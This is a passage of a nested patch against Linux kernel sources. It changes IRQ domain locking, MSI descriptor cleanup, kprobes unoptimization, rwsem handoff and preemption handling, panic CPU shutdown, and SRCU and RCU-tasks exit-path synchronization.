+-	if (!irq_data) {
+-		if (irq_domain_is_hierarchy(domain))
+-			irq_domain_free_irqs(virq, 1);
+-		else
+-			irq_dispose_mapping(virq);
+-		return 0;
++	if (WARN_ON(!irq_data)) {
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	/* Store trigger type */
+ 	irqd_set_trigger_type(irq_data, type);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -1102,12 +1159,15 @@ struct irq_domain *irq_domain_create_hierarchy(struct irq_domain *parent,
+ 	struct irq_domain *domain;
+ 
+ 	if (size)
+-		domain = irq_domain_create_linear(fwnode, size, ops, host_data);
++		domain = __irq_domain_create(fwnode, size, size, 0, ops, host_data);
+ 	else
+-		domain = irq_domain_create_tree(fwnode, ops, host_data);
++		domain = __irq_domain_create(fwnode, 0, ~0, 0, ops, host_data);
++
+ 	if (domain) {
+ 		domain->parent = parent;
+ 		domain->flags |= flags;
++
++		__irq_domain_publish(domain);
+ 	}
+ 
+ 	return domain;
+@@ -1426,40 +1486,12 @@ int irq_domain_alloc_irqs_hierarchy(struct irq_domain *domain,
+ 	return domain->ops->alloc(domain, irq_base, nr_irqs, arg);
+ }
+ 
+-/**
+- * __irq_domain_alloc_irqs - Allocate IRQs from domain
+- * @domain:	domain to allocate from
+- * @irq_base:	allocate specified IRQ number if irq_base >= 0
+- * @nr_irqs:	number of IRQs to allocate
+- * @node:	NUMA node id for memory allocation
+- * @arg:	domain specific argument
+- * @realloc:	IRQ descriptors have already been allocated if true
+- * @affinity:	Optional irq affinity mask for multiqueue devices
+- *
+- * Allocate IRQ numbers and initialized all data structures to support
+- * hierarchy IRQ domains.
+- * Parameter @realloc is mainly to support legacy IRQs.
+- * Returns error code or allocated IRQ number
+- *
+- * The whole process to setup an IRQ has been split into two steps.
+- * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
+- * descriptor and required hardware resources. The second step,
+- * irq_domain_activate_irq(), is to program the hardware with preallocated
+- * resources. In this way, it's easier to rollback when failing to
+- * allocate resources.
+- */
+-int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+-			    unsigned int nr_irqs, int node, void *arg,
+-			    bool realloc, const struct irq_affinity_desc *affinity)
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
+ {
+ 	int i, ret, virq;
+ 
+-	if (domain == NULL) {
+-		domain = irq_default_domain;
+-		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
+-			return -EINVAL;
+-	}
+-
+ 	if (realloc && irq_base >= 0) {
+ 		virq = irq_base;
+ 	} else {
+@@ -1478,24 +1510,18 @@ int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+ 		goto out_free_desc;
+ 	}
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	ret = irq_domain_alloc_irqs_hierarchy(domain, virq, nr_irqs, arg);
+-	if (ret < 0) {
+-		mutex_unlock(&irq_domain_mutex);
++	if (ret < 0)
+ 		goto out_free_irq_data;
+-	}
+ 
+ 	for (i = 0; i < nr_irqs; i++) {
+ 		ret = irq_domain_trim_hierarchy(virq + i);
+-		if (ret) {
+-			mutex_unlock(&irq_domain_mutex);
++		if (ret)
+ 			goto out_free_irq_data;
+-		}
+ 	}
+-	
++
+ 	for (i = 0; i < nr_irqs; i++)
+ 		irq_domain_insert_irq(virq + i);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ 
+@@ -1505,6 +1531,48 @@ out_free_desc:
+ 	irq_free_descs(virq, nr_irqs);
+ 	return ret;
+ }
++
++/**
++ * __irq_domain_alloc_irqs - Allocate IRQs from domain
++ * @domain:	domain to allocate from
++ * @irq_base:	allocate specified IRQ number if irq_base >= 0
++ * @nr_irqs:	number of IRQs to allocate
++ * @node:	NUMA node id for memory allocation
++ * @arg:	domain specific argument
++ * @realloc:	IRQ descriptors have already been allocated if true
++ * @affinity:	Optional irq affinity mask for multiqueue devices
++ *
++ * Allocate IRQ numbers and initialized all data structures to support
++ * hierarchy IRQ domains.
++ * Parameter @realloc is mainly to support legacy IRQs.
++ * Returns error code or allocated IRQ number
++ *
++ * The whole process to setup an IRQ has been split into two steps.
++ * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
++ * descriptor and required hardware resources. The second step,
++ * irq_domain_activate_irq(), is to program the hardware with preallocated
++ * resources. In this way, it's easier to rollback when failing to
++ * allocate resources.
++ */
++int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
++			    unsigned int nr_irqs, int node, void *arg,
++			    bool realloc, const struct irq_affinity_desc *affinity)
++{
++	int ret;
++
++	if (domain == NULL) {
++		domain = irq_default_domain;
++		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
++			return -EINVAL;
++	}
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_alloc_irqs_locked(domain, irq_base, nr_irqs, node, arg,
++					   realloc, affinity);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(__irq_domain_alloc_irqs);
+ 
+ /* The irq_data was moved, fix the revmap to refer to the new location */
+@@ -1865,6 +1933,13 @@ void irq_domain_set_info(struct irq_domain *domain, unsigned int virq,
+ 	irq_set_handler_data(virq, handler_data);
+ }
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
++{
++	return -EINVAL;
++}
++
+ static void irq_domain_check_hierarchy(struct irq_domain *domain)
+ {
+ }
+diff --git a/kernel/irq/msi.c b/kernel/irq/msi.c
+index 783a3e6a0b107..a020bc97021f3 100644
+--- a/kernel/irq/msi.c
++++ b/kernel/irq/msi.c
+@@ -1084,10 +1084,13 @@ int msi_domain_populate_irqs(struct irq_domain *domain, struct device *dev,
+ 	struct xarray *xa;
+ 	int ret, virq;
+ 
+-	if (!msi_ctrl_valid(dev, &ctrl))
+-		return -EINVAL;
+-
+ 	msi_lock_descs(dev);
++
++	if (!msi_ctrl_valid(dev, &ctrl)) {
++		ret = -EINVAL;
++		goto unlock;
++	}
++
+ 	ret = msi_domain_add_simple_msi_descs(dev, &ctrl);
+ 	if (ret)
+ 		goto unlock;
+@@ -1109,14 +1112,35 @@ int msi_domain_populate_irqs(struct irq_domain *domain, struct device *dev,
+ 	return 0;
+ 
+ fail:
+-	for (--virq; virq >= virq_base; virq--)
++	for (--virq; virq >= virq_base; virq--) {
++		msi_domain_depopulate_descs(dev, virq, 1);
+ 		irq_domain_free_irqs_common(domain, virq, 1);
++	}
+ 	msi_domain_free_descs(dev, &ctrl);
+ unlock:
+ 	msi_unlock_descs(dev);
+ 	return ret;
+ }
+ 
++void msi_domain_depopulate_descs(struct device *dev, int virq_base, int nvec)
++{
++	struct msi_ctrl ctrl = {
++		.domid	= MSI_DEFAULT_DOMAIN,
++		.first  = virq_base,
++		.last	= virq_base + nvec - 1,
++	};
++	struct msi_desc *desc;
++	struct xarray *xa;
++	unsigned long idx;
++
++	if (!msi_ctrl_valid(dev, &ctrl))
++		return;
++
++	xa = &dev->msi.data->__domains[ctrl.domid].store;
++	xa_for_each_range(xa, idx, desc, ctrl.first, ctrl.last)
++		desc->irq = 0;
++}
++
+ /*
+  * Carefully check whether the device can use reservation mode. If
+  * reservation mode is enabled then the early activation will assign a
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 1c18ecf9f98b1..00e177de91ccd 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -458,7 +458,7 @@ static inline int kprobe_optready(struct kprobe *p)
+ }
+ 
+ /* Return true if the kprobe is disarmed. Note: p must be on hash list */
+-static inline bool kprobe_disarmed(struct kprobe *p)
++bool kprobe_disarmed(struct kprobe *p)
+ {
+ 	struct optimized_kprobe *op;
+ 
+@@ -555,17 +555,15 @@ static void do_unoptimize_kprobes(void)
+ 	/* See comment in do_optimize_kprobes() */
+ 	lockdep_assert_cpus_held();
+ 
+-	/* Unoptimization must be done anytime */
+-	if (list_empty(&unoptimizing_list))
+-		return;
++	if (!list_empty(&unoptimizing_list))
++		arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+ 
+-	arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+-	/* Loop on 'freeing_list' for disarming */
++	/* Loop on 'freeing_list' for disarming and removing from kprobe hash list */
+ 	list_for_each_entry_safe(op, tmp, &freeing_list, list) {
+ 		/* Switching from detour code to origin */
+ 		op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+-		/* Disarm probes if marked disabled */
+-		if (kprobe_disabled(&op->kp))
++		/* Disarm probes if marked disabled and not gone */
++		if (kprobe_disabled(&op->kp) && !kprobe_gone(&op->kp))
+ 			arch_disarm_kprobe(&op->kp);
+ 		if (kprobe_unused(&op->kp)) {
+ 			/*
+@@ -662,7 +660,7 @@ void wait_for_kprobe_optimizer(void)
+ 	mutex_unlock(&kprobe_mutex);
+ }
+ 
+-static bool optprobe_queued_unopt(struct optimized_kprobe *op)
++bool optprobe_queued_unopt(struct optimized_kprobe *op)
+ {
+ 	struct optimized_kprobe *_op;
+ 
+@@ -797,14 +795,13 @@ static void kill_optimized_kprobe(struct kprobe *p)
+ 	op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+ 
+ 	if (kprobe_unused(p)) {
+-		/* Enqueue if it is unused */
+-		list_add(&op->list, &freeing_list);
+ 		/*
+-		 * Remove unused probes from the hash list. After waiting
+-		 * for synchronization, this probe is reclaimed.
+-		 * (reclaiming is done by do_free_cleaned_kprobes().)
++		 * Unused kprobe is on unoptimizing or freeing list. We move it
++		 * to freeing_list and let the kprobe_optimizer() remove it from
++		 * the kprobe hash list and free it.
+ 		 */
+-		hlist_del_rcu(&op->kp.hlist);
++		if (optprobe_queued_unopt(op))
++			list_move(&op->list, &freeing_list);
+ 	}
+ 
+ 	/* Don't touch the code, because it is already freed. */
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index e3375bc40dadc..50d4863974e7a 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -55,6 +55,7 @@
+ #include <linux/rcupdate.h>
+ #include <linux/kprobes.h>
+ #include <linux/lockdep.h>
++#include <linux/context_tracking.h>
+ 
+ #include <asm/sections.h>
+ 
+@@ -6555,6 +6556,7 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ {
+ 	struct task_struct *curr = current;
+ 	int dl = READ_ONCE(debug_locks);
++	bool rcu = warn_rcu_enter();
+ 
+ 	/* Note: the following can be executed concurrently, so be careful. */
+ 	pr_warn("\n");
+@@ -6595,5 +6597,6 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ 	lockdep_print_held_locks(curr);
+ 	pr_warn("\nstack backtrace:\n");
+ 	dump_stack();
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL_GPL(lockdep_rcu_suspicious);
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 44873594de031..84d5b649b95fe 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -624,18 +624,16 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 			 */
+ 			if (first->handoff_set && (waiter != first))
+ 				return false;
+-
+-			/*
+-			 * First waiter can inherit a previously set handoff
+-			 * bit and spin on rwsem if lock acquisition fails.
+-			 */
+-			if (waiter == first)
+-				waiter->handoff_set = true;
+ 		}
+ 
+ 		new = count;
+ 
+ 		if (count & RWSEM_LOCK_MASK) {
++			/*
++			 * A waiter (first or not) can set the handoff bit
++			 * if it is an RT task or wait in the wait queue
++			 * for too long.
++			 */
+ 			if (has_handoff || (!rt_task(waiter->task) &&
+ 					    !time_after(jiffies, waiter->timeout)))
+ 				return false;
+@@ -651,11 +649,12 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 	} while (!atomic_long_try_cmpxchg_acquire(&sem->count, &count, new));
+ 
+ 	/*
+-	 * We have either acquired the lock with handoff bit cleared or
+-	 * set the handoff bit.
++	 * We have either acquired the lock with handoff bit cleared or set
++	 * the handoff bit. Only the first waiter can have its handoff_set
++	 * set here to enable optimistic spinning in slowpath loop.
+ 	 */
+ 	if (new & RWSEM_FLAG_HANDOFF) {
+-		waiter->handoff_set = true;
++		first->handoff_set = true;
+ 		lockevent_inc(rwsem_wlock_handoff);
+ 		return false;
+ 	}
+@@ -1092,7 +1091,7 @@ queue:
+ 			/* Ordered by sem->wait_lock against rwsem_mark_wake(). */
+ 			break;
+ 		}
+-		schedule();
++		schedule_preempt_disabled();
+ 		lockevent_inc(rwsem_sleep_reader);
+ 	}
+ 
+@@ -1254,14 +1253,20 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+  */
+ static inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
++	int ret = 0;
+ 	long count;
+ 
++	preempt_disable();
+ 	if (!rwsem_read_trylock(sem, &count)) {
+-		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state)))
+-			return -EINTR;
++		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state))) {
++			ret = -EINTR;
++			goto out;
++		}
+ 		DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 	}
+-	return 0;
++out:
++	preempt_enable();
++	return ret;
+ }
+ 
+ static inline void __down_read(struct rw_semaphore *sem)
+@@ -1281,19 +1286,23 @@ static inline int __down_read_killable(struct rw_semaphore *sem)
+ 
+ static inline int __down_read_trylock(struct rw_semaphore *sem)
+ {
++	int ret = 0;
+ 	long tmp;
+ 
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 
++	preempt_disable();
+ 	tmp = atomic_long_read(&sem->count);
+ 	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
+ 		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
+ 						    tmp + RWSEM_READER_BIAS)) {
+ 			rwsem_set_reader_owned(sem);
+-			return 1;
++			ret = 1;
++			break;
+ 		}
+ 	}
+-	return 0;
++	preempt_enable();
++	return ret;
+ }
+ 
+ /*
+@@ -1335,6 +1344,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 	DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 
++	preempt_disable();
+ 	rwsem_clear_reader_owned(sem);
+ 	tmp = atomic_long_add_return_release(-RWSEM_READER_BIAS, &sem->count);
+ 	DEBUG_RWSEMS_WARN_ON(tmp < 0, sem);
+@@ -1343,6 +1353,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 		clear_nonspinnable(sem);
+ 		rwsem_wake(sem);
+ 	}
++	preempt_enable();
+ }
+ 
+ /*
+@@ -1662,6 +1673,12 @@ void down_read_non_owner(struct rw_semaphore *sem)
+ {
+ 	might_sleep();
+ 	__down_read(sem);
++	/*
++	 * The owner value for a reader-owned lock is mostly for debugging
++	 * purpose only and is not critical to the correct functioning of
++	 * rwsem. So it is perfectly fine to set it in a preempt-enabled
++	 * context here.
++	 */
+ 	__rwsem_set_reader_owned(sem, NULL);
+ }
+ EXPORT_SYMBOL(down_read_non_owner);
+diff --git a/kernel/panic.c b/kernel/panic.c
+index 463c9295bc28a..5cfea8302d23a 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -34,6 +34,7 @@
+ #include <linux/ratelimit.h>
+ #include <linux/debugfs.h>
+ #include <linux/sysfs.h>
++#include <linux/context_tracking.h>
+ #include <trace/events/error_report.h>
+ #include <asm/sections.h>
+ 
+@@ -211,9 +212,6 @@ static void panic_print_sys_info(bool console_flush)
+ 		return;
+ 	}
+ 
+-	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
+-		trigger_all_cpu_backtrace();
+-
+ 	if (panic_print & PANIC_PRINT_TASK_INFO)
+ 		show_state();
+ 
+@@ -243,6 +241,30 @@ void check_panic_on_warn(const char *origin)
+ 		      origin, limit);
+ }
+ 
++/*
++ * Helper that triggers the NMI backtrace (if set in panic_print)
++ * and then performs the secondary CPUs shutdown - we cannot have
++ * the NMI backtrace after the CPUs are off!
++ */
++static void panic_other_cpus_shutdown(bool crash_kexec)
++{
++	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
++		trigger_all_cpu_backtrace();
++
++	/*
++	 * Note that smp_send_stop() is the usual SMP shutdown function,
++	 * which unfortunately may not be hardened to work in a panic
++	 * situation. If we want to do crash dump after notifier calls
++	 * and kmsg_dump, we will need architecture dependent extra
++	 * bits in addition to stopping other CPUs, hence we rely on
++	 * crash_smp_send_stop() for that.
++	 */
++	if (!crash_kexec)
++		smp_send_stop();
++	else
++		crash_smp_send_stop();
++}
++
+ /**
+  *	panic - halt the system
+  *	@fmt: The text string to print
+@@ -333,23 +355,10 @@ void panic(const char *fmt, ...)
+ 	 *
+ 	 * Bypass the panic_cpu check and call __crash_kexec directly.
+ 	 */
+-	if (!_crash_kexec_post_notifiers) {
++	if (!_crash_kexec_post_notifiers)
+ 		__crash_kexec(NULL);
+ 
+-		/*
+-		 * Note smp_send_stop is the usual smp shutdown function, which
+-		 * unfortunately means it may not be hardened to work in a
+-		 * panic situation.
+-		 */
+-		smp_send_stop();
+-	} else {
+-		/*
+-		 * If we want to do crash dump after notifier calls and
+-		 * kmsg_dump, we will need architecture dependent extra
+-		 * works in addition to stopping other CPUs.
+-		 */
+-		crash_smp_send_stop();
+-	}
++	panic_other_cpus_shutdown(_crash_kexec_post_notifiers);
+ 
+ 	/*
+ 	 * Run any panic handlers, including those that might need to
+@@ -679,6 +688,7 @@ void __warn(const char *file, int line, void *caller, unsigned taint,
+ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 		       const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	struct warn_args args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -693,11 +703,13 @@ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 	va_start(args.args, fmt);
+ 	__warn(file, line, __builtin_return_address(0), taint, NULL, &args);
+ 	va_end(args.args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(warn_slowpath_fmt);
+ #else
+ void __warn_printk(const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	va_list args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -705,6 +717,7 @@ void __warn_printk(const char *fmt, ...)
+ 	va_start(args, fmt);
+ 	vprintk(fmt, args);
+ 	va_end(args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(__warn_printk);
+ #endif
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index f4f8cb0435b45..fc21c5d5fd5de 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
+@@ -244,7 +244,24 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		if (pid_ns->pid_allocated == init_pids)
+ 			break;
++		/*
++		 * Release tasks_rcu_exit_srcu to avoid following deadlock:
++		 *
++		 * 1) TASK A unshare(CLONE_NEWPID)
++		 * 2) TASK A fork() twice -> TASK B (child reaper for new ns)
++		 *    and TASK C
++		 * 3) TASK B exits, kills TASK C, waits for TASK A to reap it
++		 * 4) TASK A calls synchronize_rcu_tasks()
++		 *                   -> synchronize_srcu(tasks_rcu_exit_srcu)
++		 * 5) *DEADLOCK*
++		 *
++		 * It is considered safe to release tasks_rcu_exit_srcu here
++		 * because we assume the current task can not be concurrently
++		 * reaped at this point.
++		 */
++		exit_tasks_rcu_stop();
+ 		schedule();
++		exit_tasks_rcu_start();
+ 	}
+ 	__set_current_state(TASK_RUNNING);
+ 
+diff --git a/kernel/power/energy_model.c b/kernel/power/energy_model.c
+index f82111837b8d1..7b44f5b89fa15 100644
+--- a/kernel/power/energy_model.c
++++ b/kernel/power/energy_model.c
+@@ -87,10 +87,7 @@ static void em_debug_create_pd(struct device *dev)
+ 
+ static void em_debug_remove_pd(struct device *dev)
+ {
+-	struct dentry *debug_dir;
+-
+-	debug_dir = debugfs_lookup(dev_name(dev), rootdir);
+-	debugfs_remove_recursive(debug_dir);
++	debugfs_lookup_and_remove(dev_name(dev), rootdir);
+ }
+ 
+ static int __init em_debug_init(void)
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index ca4b5dcec675b..16953784a0bdf 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -726,7 +726,7 @@ static void srcu_gp_start(struct srcu_struct *ssp)
+ 	int state;
+ 
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = this_cpu_ptr(ssp->sda);
+ 	lockdep_assert_held(&ACCESS_PRIVATE(ssp, lock));
+@@ -837,7 +837,8 @@ static void srcu_gp_end(struct srcu_struct *ssp)
+ 	/* Initiate callback invocation as needed. */
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
+ 	if (ss_state < SRCU_SIZE_WAIT_BARRIER) {
+-		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, 0), cbdelay);
++		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, get_boot_cpu_id()),
++					cbdelay);
+ 	} else {
+ 		idx = rcu_seq_ctr(gpseq) % ARRAY_SIZE(snp->srcu_have_cbs);
+ 		srcu_for_each_node_breadth_first(ssp, snp) {
+@@ -1161,7 +1162,7 @@ static unsigned long srcu_gp_start_if_needed(struct srcu_struct *ssp,
+ 	idx = __srcu_read_lock_nmisafe(ssp);
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
+ 	if (ss_state < SRCU_SIZE_WAIT_CALL)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = raw_cpu_ptr(ssp->sda);
+ 	spin_lock_irqsave_sdp_contention(sdp, &flags);
+@@ -1497,7 +1498,7 @@ void srcu_barrier(struct srcu_struct *ssp)
+ 
+ 	idx = __srcu_read_lock_nmisafe(ssp);
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, 0));
++		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda,	get_boot_cpu_id()));
+ 	else
+ 		for_each_possible_cpu(cpu)
+ 			srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, cpu));
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index fe9840d90e960..d5a4a129a85e9 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -384,6 +384,7 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ {
+ 	int cpu;
+ 	unsigned long flags;
++	bool gpdone = poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq);
+ 	long n;
+ 	long ncbs = 0;
+ 	long ncbsnz = 0;
+@@ -425,21 +426,23 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ 			WRITE_ONCE(rtp->percpu_enqueue_shift, order_base_2(nr_cpu_ids));
+ 			smp_store_release(&rtp->percpu_enqueue_lim, 1);
+ 			rtp->percpu_dequeue_gpseq = get_state_synchronize_rcu();
++			gpdone = false;
+ 			pr_info("Starting switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+-	if (rcu_task_cb_adjust && !ncbsnz &&
+-	    poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq)) {
++	if (rcu_task_cb_adjust && !ncbsnz && gpdone) {
+ 		raw_spin_lock_irqsave(&rtp->cbs_gbl_lock, flags);
+ 		if (rtp->percpu_enqueue_lim < rtp->percpu_dequeue_lim) {
+ 			WRITE_ONCE(rtp->percpu_dequeue_lim, 1);
+ 			pr_info("Completing switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+-		for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
+-			struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
++		if (rtp->percpu_dequeue_lim == 1) {
++			for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
++				struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
+ 
+-			WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++				WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++			}
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+@@ -560,8 +563,9 @@ static int __noreturn rcu_tasks_kthread(void *arg)
+ static void synchronize_rcu_tasks_generic(struct rcu_tasks *rtp)
+ {
+ 	/* Complain if the scheduler has not started.  */
+-	WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
+-			 "synchronize_rcu_tasks called too soon");
++	if (WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
++			 "synchronize_%s() called too soon", rtp->name))
++		return;
+ 
+ 	// If the grace-period kthread is running, use it.
+ 	if (READ_ONCE(rtp->kthread_ptr)) {
+@@ -827,11 +831,21 @@ static void rcu_tasks_pertask(struct task_struct *t, struct list_head *hop)
+ static void rcu_tasks_postscan(struct list_head *hop)
+ {
+ 	/*
+-	 * Wait for tasks that are in the process of exiting.  This
+-	 * does only part of the job, ensuring that all tasks that were
+-	 * previously exiting reach the point where they have disabled
+-	 * preemption, allowing the later synchronize_rcu() to finish
+-	 * the job.
++	 * Exiting tasks may escape the tasklist scan. Those are vulnerable
++	 * until their final schedule() with TASK_DEAD state. To cope with
++	 * this, divide the fragile exit path part in two intersecting
++	 * read side critical sections:
++	 *
++	 * 1) An _SRCU_ read side starting before calling exit_notify(),
++	 *    which may remove the task from the tasklist, and ending after
++	 *    the final preempt_disable() call in do_exit().
++	 *
++	 * 2) An _RCU_ read side starting with the final preempt_disable()
++	 *    call in do_exit() and ending with the final call to schedule()
++	 *    with TASK_DEAD state.
++	 *
++	 * This handles the part 1). And postgp will handle part 2) with a
++	 * call to synchronize_rcu().
+ 	 */
+ 	synchronize_srcu(&tasks_rcu_exit_srcu);
+ }
+@@ -898,7 +912,10 @@ static void rcu_tasks_postgp(struct rcu_tasks *rtp)
+ 	 *
+ 	 * In addition, this synchronize_rcu() waits for exiting tasks
+ 	 * to complete their final preempt_disable() region of execution,
+-	 * cleaning up after the synchronize_srcu() above.
++	 * cleaning up after synchronize_srcu(&tasks_rcu_exit_srcu),
++	 * enforcing the whole region before tasklist removal until
++	 * the final schedule() with TASK_DEAD state to be an RCU TASKS
++	 * read side critical section.
+ 	 */
+ 	synchronize_rcu();
+ }
+@@ -988,27 +1005,42 @@ void show_rcu_tasks_classic_gp_kthread(void)
+ EXPORT_SYMBOL_GPL(show_rcu_tasks_classic_gp_kthread);
+ #endif // !defined(CONFIG_TINY_RCU)
+ 
+-/* Do the srcu_read_lock() for the above synchronize_srcu().  */
++/*
++ * Contribute to protect against tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
+ void exit_tasks_rcu_start(void) __acquires(&tasks_rcu_exit_srcu)
+ {
+-	preempt_disable();
+ 	current->rcu_tasks_idx = __srcu_read_lock(&tasks_rcu_exit_srcu);
+-	preempt_enable();
+ }
+ 
+-/* Do the srcu_read_unlock() for the above synchronize_srcu().  */
+-void exit_tasks_rcu_finish(void) __releases(&tasks_rcu_exit_srcu)
++/*
++ * Contribute to protect against tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_stop(void) __releases(&tasks_rcu_exit_srcu)
+ {
+ 	struct task_struct *t = current;
+ 
+-	preempt_disable();
+ 	__srcu_read_unlock(&tasks_rcu_exit_srcu, t->rcu_tasks_idx);
+-	preempt_enable();
+-	exit_tasks_rcu_finish_trace(t);
++}
++
++/*
++ * Contribute to protect against tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_finish(void)
++{
++	exit_tasks_rcu_stop();
++	exit_tasks_rcu_finish_trace(current);
+ }
+ 
+ #else /* #ifdef CONFIG_TASKS_RCU */
+ void exit_tasks_rcu_start(void) { }
++void exit_tasks_rcu_stop(void) { }
+ void exit_tasks_rcu_finish(void) { exit_tasks_rcu_finish_trace(current); }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU */
+ 
+@@ -1036,9 +1068,6 @@ static void rcu_tasks_be_rude(struct work_struct *work)
+ // Wait for one rude RCU-tasks grace period.
+ static void rcu_tasks_rude_wait_gp(struct rcu_tasks *rtp)
+ {
+-	if (num_online_cpus() <= 1)
+-		return;	// Fastpath for only one CPU.
+-
+ 	rtp->n_ipis += cpumask_weight(cpu_online_mask);
+ 	schedule_on_each_cpu(rcu_tasks_be_rude);
+ }
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index ed6c3cce28f23..927abaf6c822e 100644
